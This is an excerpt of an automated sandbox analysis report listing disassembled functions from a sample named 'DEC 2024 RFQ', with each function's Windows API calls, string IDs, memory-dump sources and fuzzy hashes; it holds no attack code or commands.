                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 1eca1526fa388268ab0320ca196182ec1f6d8030f54931aa1608b3b590778554
                                                                                                                      • Instruction ID: 8cd9c7c7180a77d92423e011d03ace5694e94805e6979c731571479534277786
                                                                                                                      • Opcode Fuzzy Hash: 1eca1526fa388268ab0320ca196182ec1f6d8030f54931aa1608b3b590778554
                                                                                                                      • Instruction Fuzzy Hash: 63112B31348746BEE724AA55DC52CAF77DCAF15720B10403AFA40AA282DB709F405FA4
                                                                                                                      Function 000842F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00084312
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00084319
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0008432F
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00084336
                                                                                                                      • _wprintf.LIBCMT ref: 0008435C
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0008437A
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00084357
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      • Opcode ID: 6490ae14f21bc5201927068ba6f103c8b50e0515805bbfd0337bb39318018b2b
                                                                                                                      • Instruction ID: afa961f20ded453dbc4f53df256c8678bc6167a91533c93d92ea5fe9d1326622
                                                                                                                      • Opcode Fuzzy Hash: 6490ae14f21bc5201927068ba6f103c8b50e0515805bbfd0337bb39318018b2b
                                                                                                                      • Instruction Fuzzy Hash: 160162F2940209BFE761A7E0DD89EFB776CEB09300F0045B1B745E6051EA785E854B74
                                                                                                                      Function 000AD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 000AD47C
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 000AD49C
                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 000AD6D7
                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000AD6F5
                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000AD716
                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 000AD735
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000AD75A
                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 000AD77D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1211466189-0
                                                                                                                      • Opcode ID: 779e9f7c7123b6787837a4e635eee079599a4bad6e18cc63dd1e8b485a7be92b
                                                                                                                      • Instruction ID: c97f2d38435c7a247e1fbecb92723b3ea5ec6f23879862c7699e1c5dc9d35dc6
                                                                                                                      • Opcode Fuzzy Hash: 779e9f7c7123b6787837a4e635eee079599a4bad6e18cc63dd1e8b485a7be92b
                                                                                                                      • Instruction Fuzzy Hash: 1AB18B75600615EBDF18CFA8C9C57AD7BF1BF09701F08806AEC4AAF695E734A950CB90
                                                                                                                      Function 00022A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 00022ACF
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00022B17
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 0005C21A
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 0005C286
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: ac072efcec7f207168719e1d960e1e0d01a18b11e70b020b4ba2fffb0eb9ad86
                                                                                                                      • Instruction ID: 088ff4bdc606fcf2f8e3d35e5e5b4d4a204b9cef195a731b968adc3128d5c34a
                                                                                                                      • Opcode Fuzzy Hash: ac072efcec7f207168719e1d960e1e0d01a18b11e70b020b4ba2fffb0eb9ad86
                                                                                                                      • Instruction Fuzzy Hash: 93413B30608B90BFE7758BA8EC8CB7F7BD2AB46301F15882DE44796961CA359885D712
                                                                                                                      Function 000870C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 000870DD
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00087114
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00087130
                                                                                                                      • _memmove.LIBCMT ref: 0008717E
                                                                                                                      • _memmove.LIBCMT ref: 0008719B
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 000871AA
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000871BF
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 000871DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      • Opcode ID: 8345cf460b6cb101455f2e0fc33ed7e3bacd1c838de952e0cbddd1e649333ee1
                                                                                                                      • Instruction ID: 2321566f9523c6fab6136cbac3c51265e16682a254cb0a811ae0a2f7c0d39315
                                                                                                                      • Opcode Fuzzy Hash: 8345cf460b6cb101455f2e0fc33ed7e3bacd1c838de952e0cbddd1e649333ee1
                                                                                                                      • Instruction Fuzzy Hash: 5B316E71900205EBDF10EFA5DC89AAAB7B8FF45710F1441B5ED04AB246DB34EA14CB64
                                                                                                                      Function 000A61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000A61EB
                                                                                                                      • GetDC.USER32(00000000), ref: 000A61F3
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000A61FE
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000A620A
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000A6246
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000A6257
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 000A6291
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000A62B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      • Opcode ID: c0a20ed4cdb3f2a05824a9b420c6fce611fb2a6bc0338f4de6f34b11cfb01bf2
                                                                                                                      • Instruction ID: 3e96987a74fe35a0ff786fef2555c24180a90454531df049d1810069c54f9352
                                                                                                                      • Opcode Fuzzy Hash: c0a20ed4cdb3f2a05824a9b420c6fce611fb2a6bc0338f4de6f34b11cfb01bf2
                                                                                                                      • Instruction Fuzzy Hash: 02314F72101614BFEB118F90CC8AFFB3FA9EF4A765F084065FE089A192C6799C41CB64
                                                                                                                      Function 0007BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 3ca567e81c5951c650a5dfef1e70c55f489cb081191fc28a2026c6283c05cc9b
                                                                                                                      • Instruction ID: 78eb77de32a3f2a9f8c52cf02eca5157e392acce9fbca3221a5c8139b46d76b7
                                                                                                                      • Opcode Fuzzy Hash: 3ca567e81c5951c650a5dfef1e70c55f489cb081191fc28a2026c6283c05cc9b
                                                                                                                      • Instruction Fuzzy Hash: D321A1B1B012097BA6157611DD52FFF779DAF50348F08C020FE0C9A647EBA8EE1582AD
                                                                                                                      Function 0008EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                        • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
                                                                                                                      • _wcstok.LIBCMT ref: 0008EC94
                                                                                                                      • _wcscpy.LIBCMT ref: 0008ED23
                                                                                                                      • _memset.LIBCMT ref: 0008ED56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                      • Opcode ID: b68ed76153d1a1f1a74c448c8286e4bb725cef316e848921fe645076e602f032
                                                                                                                      • Instruction ID: 4c511d1d1b7efdd08cb19e5e20ec5e6383781f2401df4f3df6e2edfca0072d7a
                                                                                                                      • Opcode Fuzzy Hash: b68ed76153d1a1f1a74c448c8286e4bb725cef316e848921fe645076e602f032
                                                                                                                      • Instruction Fuzzy Hash: EFC19D716087519FC764EF24D885AAAB7E4FF85310F00492DF9999B2A3DB30EC45CB86
                                                                                                                      Function 00021424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05336994b49305195f5c995bd4120d1437e5fd69ece442e6b226181754bddfc7
                                                                                                                      • Instruction ID: 2d8c2c77c00219f605f5e18a1ad31dc04c1e2b29ff39518a150689035c7a22b2
                                                                                                                      • Opcode Fuzzy Hash: 05336994b49305195f5c995bd4120d1437e5fd69ece442e6b226181754bddfc7
                                                                                                                      • Instruction Fuzzy Hash: A7717A30900519EFDB14DF98DC48AFFBBB9FF99314F108159F915AA251C734AA51CBA0
                                                                                                                      Function 00096B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d0a179707bdfb85882ac5e13ad349e4dc3074447d3d9799d1a8fd0e413cb4aaf
                                                                                                                      • Instruction ID: 8a83c256d5425ec5689f3911825a36fb8fa62eaa54bbae43779e6ec4cee7cd4c
                                                                                                                      • Opcode Fuzzy Hash: d0a179707bdfb85882ac5e13ad349e4dc3074447d3d9799d1a8fd0e413cb4aaf
                                                                                                                      • Instruction Fuzzy Hash: F261DF72608310ABDB10EB24DC81EAFB7E8AF84714F40491DF5959B2A3DB31ED44CB92
                                                                                                                      Function 000AB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(016F5690), ref: 000AB3EB
                                                                                                                      • IsWindowEnabled.USER32(016F5690), ref: 000AB3F7
                                                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 000AB4DB
                                                                                                                      • SendMessageW.USER32(016F5690,000000B0,?,?), ref: 000AB512
                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 000AB54F
                                                                                                                      • GetWindowLongW.USER32(016F5690,000000EC), ref: 000AB571
                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 000AB589
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4072528602-0
                                                                                                                      • Opcode ID: 2c23262b0eaeeb2f14fce367e67e0b4e8ef2ffc32dc6af9a459dddeebcba396c
                                                                                                                      • Instruction ID: 96b1073f7656bb3deacbe4ccd96953a76de83e1645ff5eecefc8da72751da147
                                                                                                                      • Opcode Fuzzy Hash: 2c23262b0eaeeb2f14fce367e67e0b4e8ef2ffc32dc6af9a459dddeebcba396c
                                                                                                                      • Instruction Fuzzy Hash: 43718B34604604EFEB609FA5C894FFA7BF9EF0B300F144459EA85A72A3C736A950DB50
                                                                                                                      Function 0009F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0009F448
                                                                                                                      • _memset.LIBCMT ref: 0009F511
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 0009F556
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                        • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0009F5CD
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009F5FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3522835683-2766056989
                                                                                                                      • Opcode ID: c4ac53a97bcf6e7c65e6732daf66bf9f8b20c77fe37b317adc216b7e9cd68819
                                                                                                                      • Instruction ID: 060f7f30c3f1f895d1a7c2cfe38b708899d59a3abdc1e7a88a93a6c1ef3213ff
                                                                                                                      • Opcode Fuzzy Hash: c4ac53a97bcf6e7c65e6732daf66bf9f8b20c77fe37b317adc216b7e9cd68819
                                                                                                                      • Instruction Fuzzy Hash: D261A075A0062ADFCF14DFA4D8859AEBBF5FF49310F148069E859AB352CB30AD41CB94
                                                                                                                      Function 00080F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 00080F8C
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00080FA1
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00081002
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00081030
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0008104F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00081095
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000810B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: fbb03ba71472f444ce31a486ff4325635c2b2385d2774868967fc2c75035740d
                                                                                                                      • Instruction ID: 6275c13fe0f5027f664fc4bd8fdcd03f0e0efdcbe49c7fe5febb2e9e2f08b6e8
                                                                                                                      • Opcode Fuzzy Hash: fbb03ba71472f444ce31a486ff4325635c2b2385d2774868967fc2c75035740d
                                                                                                                      • Instruction Fuzzy Hash: 5D51C3705046D539FB7662348C05BFABEE97F06304F088589E2D8858D3C2D9ACDADB51
                                                                                                                      Function 00080D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 00080DA5
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00080DBA
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00080E1B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00080E47
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00080E64
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00080EA8
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00080EC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
